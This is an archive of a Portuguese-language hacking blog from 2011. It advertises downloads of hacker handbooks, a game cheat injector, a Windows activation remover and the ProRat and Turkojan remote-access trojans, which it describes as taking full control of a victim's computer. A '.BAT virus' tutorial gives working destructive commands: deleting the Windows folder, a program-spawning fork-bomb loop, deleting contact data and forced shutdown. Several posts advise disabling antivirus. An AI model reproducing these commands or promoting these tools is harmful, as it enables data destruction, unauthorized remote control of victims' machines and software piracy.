Por Causa do fechamento do Megaupload
e contras excluídas o site foi fechado
Mostrando postagens com marcador Hacker. Mostrar todas as postagens
Mostrando postagens com marcador Hacker. Mostrar todas as postagens
quarta-feira, 21 de dezembro de 2011
Invadindo internet sem fio (wi-fi)
sexta-feira, 8 de julho de 2011
Apostila Hacker Para Iniciantes e Guia do Hacker
2 Apostilas Hacker Incríveis
Apostila Para Iniciantes
Introdução
Segurança
O que é ser um Hacker?
O que eu tenho que fazer para ser um Hacker?
O que é um vírus de computador?
Protocolos TCP/IP o que são?
Dicionário Hacker
Produtos Exclusivos Mundo Dos Hackers
Conclusão
Guia do Hacker
Introdução
Prefácio
Introdução à segurança
Definições de segurança
Segurança em informática
Estamos seguros?
Características de um sistema inseguro
Administrador
Sistemas operacionais
A segurança ao longo da história
Invasores digitais
Hackers
Crackers
Phreakers
Funcionários
Mitos e fantasias
Engenharia social
Como conseguir uma política eficiente de proteção
Analisando o nível de perigo
A influência do sistema operacional
Unix versus Windows
Vantagens do open source
Configurações malfeitas
Ataques restritos a um tipo de sistema
Ataques universais intra-sistemas
Recusa de serviço e invasão
Protocolos , ferramentas de rede e footprinting
Protocolos
Tipos de protocolos
Protocolos Abertos
Protocolos Específicos
Tipos de transmissão de dados
Unicast
Broadcast
Multicast
NetBios
IPX/SPX
AppleTalk
TCP/IP
IP
Portas
DNS
SMTP
POP3
TELNET
FTP
HTTP
SNMP
Ferramentas TCP/IP
Programinhas úteis
Arp
FTP
IPCONFIG
Nbtstat
Ping
Telnet
Tracert
Winipcfg
Footprinting
Whois
Análise de homepages
Pesquisa geral
Ferramentas e segredos
Trojans
Definição de Trojan
Perigo real
Tipos de cavalo de tróia
Invasão por portas TCP e UDP
Trojans de informação
Trojans de ponte
Rootkits
Trojans comerciais
Escondendo o trojan em arquivos confiáveis
Utilizando compressores de executáveis
Spoofando uma porta
Métodos eficazes e os não tão eficazes de se retirar o programa
Detecção por portas
Detecção pelo arquivo
Detecção por string
Detecção manual
Passo-a-passo: cavalos de tróia
Utilizando um trojan
Utilizando o Anti-Trojans
Denial of Service
Definição
Danos sem invasões
Utilizando o broadcast como arma
Syn-flood
OOB
Smurf
Softwares Zumbis
Diminuindo o impacto causado pelos ataques
Sniffers
Definição
Filtrando pacotes na rede
Capturando senhas
Sniffers em trojans
Roteadores
Anti-Sniffers
Scanners
Definição
Descobrindo falhas em um host
Portas abertas com serviços ativos
Máquinas ativas da subnet
Scanneando o netbios
Checando as vulnerabilidades em servidores HTTP e FTP
Analisando partes físicas
Wardialers
Instalando proteções
Passo-a-passo: Scanneando
Scanneando hosts conhecidos de uma rede
Scanneando o NetBIOS
Scanneando à procura de falhas
Criptografia
Introdução
Chaves públicas e privadas
PGP
Saídas alternativas
Crackeando
Conceito de “crackear”
Wordlists
O processo de bruteforce
Senhas padrões
Multi-bruteforce
Política de senhas não-crackeáveis
Falhas
Definição
Como surge o bug
Exemplos de falhas
Buffer overflows
Race condition
Descobrindo se algum sistema têm falhas
Utilizando exploits
Instalando patches
Anonimidade
Ser anônimo na rede
Usando o anonymizer
Proxys
Wingates
Remailers
Shells
Outdials
IP Spoof.
Non-blind spoof
Blind spoof
Sistemas operacionais
Unix e Linux
Como tudo começou
Autenticação de senhas – a criptografia DES
Shadowing
SSH, Telnet e Rlogin
Vírus e trojans
Buffer overflows e condição de corrida
Aumentando a segurança do sistema
Microsoft
Como tudo começou
Diferenças das plataforma Windows ME e 2000
Autenticação de senhas
Vírus e trojans
Buffer overflows
Badwin
Worms
Aumentando a segurança do sistema
DOS
Por quê o DOS?
Arquivos BAT
Badcoms
Caracteres ALT
Macros do doskey
Variáveis do sistema
Comandos ANSI
Velhos truques
Aprendendo a se proteger
Firewall
Conceito de Firewal
Eficiência
Firewall analizando a camada de rede
Firewall analizando a camada de aplicação
Conclusão
Códigos-fonte
A importância da programação
Por quê programar?
Linguagens orientadas a objeto
Aprendendo a usar o Delphi
Instalando os componentes necessários
Algoritmo
Object Pascal
Criando os aplicativos
Visão gera
Trojan simples
Mini-firewall
Perguntas mais frequentes
O que é um FAQ (perguntas mais frequentes)?
Como descobrir o ip e derrubar pessoas em um bate-papo
Como posso diferenciar trojans de anti-trojans com um scanner?
Eu posso usar o telnet para entrar em qualquer porta?
Por quê você colocou tão pouco de Linux / Unix no livro?
Você me ajuda a invadir o sistema fulano de tal?
Conhecendo mais do assunto
Sites de segurança versus sites de hackers
A importância do profissional de segurança
Sites com matérias sobre o assunto
Filmes
Livros
MEGAUPLOAD
sábado, 21 de maio de 2011
Hacker para combat arms UNLOOKs + INJETOREs + T.K.O

Um excelente hacker para Combat Arms
Desative seu Antivirus!
COMO INSTALAR
Abra a pasta UNLOOK'S e instale o passo 1 e o passo 2
depois disso vai aparecer uma pasta no seu desktop com o nome de Matrix Hacker
dentro da pasta click em X1nject
configure assim:
What to inject: Engine.exe
How to injection: Automatically
Click em Browser e selecione Matrix - T.K.O.dll
vai ficar assim:

pronto
agora e so começar o jogo e se divertir
quinta-feira, 19 de maio de 2011
Como Fazer um Vírus Formato .BAT
Este e um tutorial de como fazer virus .BAT com o bloco de notas
A responsabilidade das conseqüências serão somente sua!
Primeiramente vá em Iniciar -> Todos os Programas -> Acessórios -> Bloco de Notas.
Quando já estiver com o bloco de notas aberto, digite os códigos que estará logo abaixo.
Quando digitar os códigos vá em Arquivo -> Salvar como... e salve o arquivo com a extensão .bat
Ex: trojan.bat
Sempre salve com esta extensão.
Ex: trojan.bat
Sempre salve com esta extensão.
Pronto o vírus ja esta feito, agora e só colocar no winrar.
Com esses virus você pode fazer de uma brincadeira inofensiva ou até destruir completamente qualquer computador.
REINICIAR O COMPUTADOR
shutdown -r -f
DESLIGAR O COMPUTADOR
shutdown -s -f
DELETA TUDO DENTRO DO WINDOWS
del /s /q c:\windows\
ABRE VÁRIOS PROGRAMAS ATÉ O COMPUTADOR TRAVAR
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
CONGELA TODOS OS MSNs ABERTOS
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
ABRE UMA MENSAGEM DE ERRO INFINITA
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETEterça-feira, 10 de maio de 2011
Cheat Engine 6.0
Mais tempo para completas as fases, vidas infinitas e a munição dos seus sonhos. Tudo isso em seus games!
Roubar nos games não é uma prática muito legal, mas de vez em quando pode ser a única maneira de derrotar aquele poderoso chefe! Seja para testar seu conhecimento em manipular processos ou ganhar aquela força extra para derrotar monstrengos, Cheat Engine é uma ferramenta que garante seus super poderes na maioria dos games.
Cheat avançado
As ferramentas de cheat mais simples são programadas apenas para determinados jogos e não funcionam com qualquer game. Já para operar as mais completas, como o Cheat Engine, recomenda-se algum conhecimento em programação. Com estas você adentra nos processos do game e alterar determinados valores (quantidade de vida, munição e etc.).
Tudo bem, se você nunca utilizou uma ferramenta similar e não faz a menor ideia de como os processos ocorrem na máquina, Cheat Engine pode resultar em mais dores de cabeça do que em super poderes. Mas com um pouco de dedicação e um conhecimento básico de inglês, os tutoriais do programa garantem que você se torne um mestre dos truques.
Sistema operacional: XP, Vista, 7
Tamanho: 4,45 MB
segunda-feira, 9 de maio de 2011
Remover WAT (WIN7)
Este é um excelente ativador.
Ele remove completamente o sistema de ativação do Windows 7.
Sistema operacional: Windows 7
Tamanho: 3,840 KB
domingo, 8 de maio de 2011
Resetar Senha do Windows
Esqueceu a senha de administrador ou usuário do seu Windows (XP, Vista ou Win. 7)?
Quer saber qual a senha da BIOS/CMOS do seu computador?
É técnico, e ao fazer manutenção em um PC, precisa ficar ligando para o dono para saber as senhas?
Esta é a ferramenta certa para você!!!
Não precisa gravar em CD, ela roda a partir Pen Drive.
Sistema operacional: Windows XP/Vista/7
Tamanho: 2,8 MB
Formato: ISO
Prorat v2.0
Nova versão do Prorat, um dos melhores programas para invasão.
A responsabilidade das conseqüências serão somente sua!
ProRat é possivel várias ações interessantes, porém a maioria das ações é contra a lei.
O prorat possui uma forma de criar trojan (cavalo de troia) intão muitos AV vão detectar, então se o seu detectar você pode simplimente desativalo para instalar e toda vez que for usar (igual eu faço). Para instalar extria (descompactar) o prorat (recomendo Winrar).
Sistema operacional: XP, Vista, 7
Tamanho: 3,2 MB
Turkojan 4 + Ícones
Nova versão completa do melhor Trojan da atualidade!
A responsabilidade das conseqüências serão somente sua!
- Suporte a conexão reversa
- Ícones personalizados
- Server com compressao UPX
- Menu Em Português
- Facilidade de Uso
-Idioma: Português
Turkojan é um trojan que tem a função de se instalar no computador da vítima e ter comtrole total do computador, como fazer download das vítima, ver o que está fazendo e etc.
Sistema operacional: XP, Vista, 7
Tamanho: 5 MB
Assinar:
Comentários (Atom)












